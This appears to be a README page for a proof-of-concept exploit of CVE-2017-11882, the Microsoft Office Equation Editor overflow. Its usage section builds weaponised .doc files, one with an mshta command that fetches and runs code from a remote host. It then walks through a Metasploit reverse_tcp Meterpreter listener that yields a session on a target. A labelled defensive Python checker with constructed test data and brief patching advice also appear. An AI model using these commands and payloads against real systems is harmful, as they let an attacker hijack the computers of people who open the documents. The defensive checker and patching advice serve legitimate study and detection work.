
CVE-2017-11882 PoC — Microsoft Office security vulnerability

Source
Associated Vulnerability
Title: Microsoft Office security vulnerability (CVE-2017-11882)
Description: Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11884.
Description
CVE-2017-11882 (affects every version of Office from 2003 through 2016)
Readme
## CVE-2017-11882 overview

Judging by its effect, the exploit works against every version of Office from 2003 through 2016, and the attack environment is very simple to set up.
The vulnerability lies in the Equation Editor component of Office: the editor process does not validate the length of a name field, which leads to a buffer overflow; by crafting a special string, an attacker can achieve arbitrary code execution.
For example, if an attacker uses this flaw to build an Office document carrying a shell backdoor, an ordinary user who opens that document can have their computer taken over directly.
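Added example from the defender's side (not code from the original repository): a minimal Python checker that walks the MTEF records of an Equation Editor "Equation Native" stream and flags FONT records whose name would not fit the fixed-size buffer the unpatched editor copies it into, which is exactly the missing length check described above. The header and record layout follow the published MTEF v3 format; the 36-byte buffer size, the record subset handled, and the two sample streams are assumptions and constructed test data.

```python
import struct

# MTEF v3 record tags (published MathType MTEF format). Only the subset needed
# for the constructed samples is walked; any other tag stops the walk.
TAG_END, TAG_LINE, TAG_FONT, TAG_SIZE, TAG_FULL = 0x00, 0x01, 0x08, 0x09, 0x0A
EQNOLEFILEHDR_LEN = 28   # OLE header that precedes the MTEF data in the stream
MTEF_HDR_LEN = 5         # version, platform, product, product version, subversion
FONT_NAME_BUF = 36       # assumed size of the editor's fixed stack buffer for the name


def font_records(stream: bytes):
    """Yield (offset, name) for every FONT record in an Equation Native stream."""
    pos = EQNOLEFILEHDR_LEN + MTEF_HDR_LEN
    while pos < len(stream):
        tag = stream[pos]
        if tag == TAG_END:
            return
        if tag == TAG_FONT:                  # tag, typeface, style, NUL-terminated name
            end = stream.find(b"\x00", pos + 3)
            if end < 0:                      # unterminated name: take the rest
                end = len(stream)
            yield pos, stream[pos + 3:end]
            pos = end + 1
        elif tag == TAG_SIZE:                # tag plus one size byte
            pos += 2
        elif tag in (TAG_LINE, TAG_FULL):    # flag-free forms carry no parameters
            pos += 1
        else:                                # flagged or unmodelled record: stop
            return


def check_equation_native(stream: bytes):
    """Return [(offset, name_length)] for FONT names that would overflow the buffer."""
    return [(off, len(name)) for off, name in font_records(stream)
            if len(name) + 1 > FONT_NAME_BUF]       # +1 for the terminating NUL


def build_stream(font_name: bytes) -> bytes:
    """Constructed test input: a one-line equation holding a single FONT record."""
    mtef = bytes([3, 1, 1, 3, 0x0A])                # MTEF header, version 3
    mtef += bytes([TAG_FULL, TAG_LINE, TAG_FONT, 1, 0]) + font_name + b"\x00" + bytes([TAG_END])
    # EQNOLEFILEHDR: cbHdr, version, clipboard format, cbObject, four reserved DWORDs
    # (only cbHdr matters to the checker; the rest are placeholder values)
    hdr = struct.pack("<HIHIIIII", EQNOLEFILEHDR_LEN, 0, 0, len(mtef), 0, 0, 0, 0)
    return hdr + mtef


if __name__ == "__main__":
    print(check_equation_native(build_stream(b"Times New Roman")))   # []
    print(check_equation_native(build_stream(b"A" * 48)))            # [(35, 48)]
```

For a real document the stream must first be pulled out of the OLE container (for example with the olefile library; embedded equations sit under the ObjectPool storage), and the walker stops at record types it does not model rather than guessing their length.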


## Affected versions
```
office 2003 
office 2007 
office 2010 
office 2013 
office 2016
```

## Usage

```
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
```

![Image](https://github.com/littlebin404/CVE-2017-11882/blob/master/img/1.png)

Opening the generated "test.doc" launches Calculator as expected.


```
python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc
```

![Image](https://github.com/littlebin404/CVE-2017-11882/blob/master/img/2.png)

![Image](https://github.com/littlebin404/CVE-2017-11882/blob/master/img/3.png)

The Word document 11882-3.doc is generated successfully.



Place the cve_2017_11882.rb file in the /usr/share/metasploit-framework/modules/exploits/windows/smb directory:
```
msf > search CVE-2017-11882
msf > use exploit/windows/smb/CVE-2017-11882 
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp 
msf exploit(CVE-2017-11882) > set lhost 192.168.43.165 
msf exploit(CVE-2017-11882) > set uripath 11882 
msf exploit(CVE-2017-11882) > exploit
```

The listener is started:

![Image](https://github.com/littlebin404/CVE-2017-11882/blob/master/img/4.png)

Opening the 11882-3.doc file on the Windows 7 target machine yields a session.

![Image](https://github.com/littlebin404/CVE-2017-11882/blob/master/img/5.png)

## Remediation
① Update online: turn on Windows Update; for most users this is sufficient.

② Apply the patch: Microsoft's advisory for this vulnerability is at https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
File Snapshot

```
[4.0K] /data/pocs/2e8b9c54e93756ca90a8fdd70c9fc01a4433cdba
├── [4.0K] img
│   ├── [ 53K] 1.png
│   ├── [4.1K] 2.png
│   ├── [127K] 3.png
│   ├── [113K] 4.png
│   └── [142K] 5.png
├── [4.0K] poc
│   ├── [ 11K] Command109b_CVE-2017-11882.py
│   ├── [ 10K] Command43b_CVE-2017-11882.py
│   ├── [9.4K] Command_CVE-2017-11882.py
│   └── [2.9K] cve_2017_11882.rb
└── [2.0K] README.md

2 directories, 10 files
```